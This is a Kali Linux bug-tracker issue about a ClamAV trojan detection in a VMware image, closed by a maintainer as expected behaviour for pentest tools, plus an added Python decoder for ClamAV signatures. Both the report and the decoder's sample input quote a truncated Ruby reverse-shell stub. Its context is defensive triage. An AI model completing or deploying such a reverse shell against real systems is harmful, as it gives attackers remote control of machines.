View Issue Details

ID: 0008023
Project: Kali Linux
Category: General Bug
View Status: public
Last Update: 2022-10-26 05:13
Reporter: trojan_bad
Assigned To: steev
Priority: urgent
Severity: major
Reproducibility: have not tried
Status: closed
Resolution: no change required
Summary: 0008023: ClamAV detected trojan in Kali VMware 64-bit image
Description

Today I ran ClamAV on my computer and it yielded an infected file with code Unix.Trojan.MSShellcode-10.

I then performed a VirusTotal analysis of the file. 2 out of 69 vendors identify this as a malicious file, namely Google and ClamAV.

This file is a chunk of a Kali Linux distribution image for VMware 64-bit that I downloaded through a torrent, pointed to by the official website.

Running sigtool --find-sigs Unix.Trojan.MSShellcode-10 | awk '{ print $2 }' | sigtool --decode-sigs
I get the decoded signature: ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSock

I did not verify the signature so that is on me, but either way, this is unexpected behavior and should be solved.

Virus total analysis: https://www.virustotal.com/gui/file/ae6391c132598358bb1409b30f901e5de2158994aa8ab92eb332fdc8884922a2/detection

Steps To Reproduce

Did not try to reproduce
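When triaging a hit like this one, reading the signature body that fired is the quickest way to tell a packaged pentest payload from a real compromise. The following is an added example, not code from the report or from ClamAV: a small decoder for the hex body of a ClamAV .ndb signature line that renders plain bytes as text and keeps the common wildcards (??, *, {n-m}, (aa|bb)) as visible markers. The signature name and line used as sample input are constructed, not the real Unix.Trojan.MSShellcode-10 entry.

```python
"""Render the hex body of a ClamAV .ndb signature as readable text.

ndb line layout: SigName:TargetType:Offset:HexSignature. Handles plain hex
bytes, ?? (any byte), * (any gap), {n-m} (bounded gap) and (aa|bb) alternatives.
"""
import re

# One token per match; order matters so "??" is tried before a hex byte pair.
TOKEN = re.compile(r"\{[^}]*\}|\([^)]*\)|\?\?|\*|[0-9a-fA-F]{2}")


def _printable(b: int) -> str:
    """ASCII for printable bytes, \\xNN escapes for everything else."""
    return chr(b) if 32 <= b < 127 else "\\x%02x" % b


def render_hex_body(body: str) -> str:
    """Turn a ClamAV hex body into text, keeping wildcards as markers."""
    out, pos = [], 0
    for m in TOKEN.finditer(body):
        if m.start() != pos:  # unsupported syntax (e.g. nibble wildcard "a?")
            raise ValueError("unexpected token at offset %d" % pos)
        pos, tok = m.end(), m.group()
        if tok == "??":
            out.append("<?>")
        elif tok == "*":
            out.append("<*>")
        elif tok.startswith("{"):
            out.append("<gap%s>" % tok)
        elif tok.startswith("("):
            alts = tok[1:-1].split("|")
            out.append("<" + "|".join(render_hex_body(a) for a in alts) + ">")
        else:
            out.append(_printable(int(tok, 16)))
    if pos != len(body):
        raise ValueError("trailing characters in hex body")
    return "".join(out)


def decode_ndb_line(line: str) -> dict:
    """Split one .ndb line into its fields and render the hex body."""
    name, target, offset, body = line.strip().split(":", 3)
    return {"name": name, "target": target, "offset": offset,
            "pattern": render_hex_body(body)}


# Constructed sample: the Ruby reverse-shell stub quoted in the report, hex-encoded
# and wrapped in an ndb line with a made-up signature name (not ClamAV's own entry).
SAMPLE_NDB = ("Example.Ruby.Stub-1:0:*:"
              + "ruby -rsocket -ropenssl -e 'exit if fork;c=".encode().hex())

if __name__ == "__main__":
    print(decode_ndb_line(SAMPLE_NDB)["pattern"])
```

Real signature lines can be obtained with the sigtool --find-sigs command shown in the report; sigtool --decode-sigs does the same job in full, this decoder only covers the subset of the hex grammar listed above.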

Activities

steev (manager), 2022-10-26 05:13, note ~0017001

This may come as a shock, but tools in Kali can be used maliciously. As such, antivirus engines can, and do, mark them as possible viruses. There is nothing to be changed on our end, this is working as intended.

Issue History

Date Modified Username Field Change
2022-10-25 22:20 trojan_bad New Issue
2022-10-26 05:13 steev Assigned To => steev
2022-10-26 05:13 steev Status new => closed
2022-10-26 05:13 steev Resolution open => no change required
2022-10-26 05:13 steev Note Added: 0017001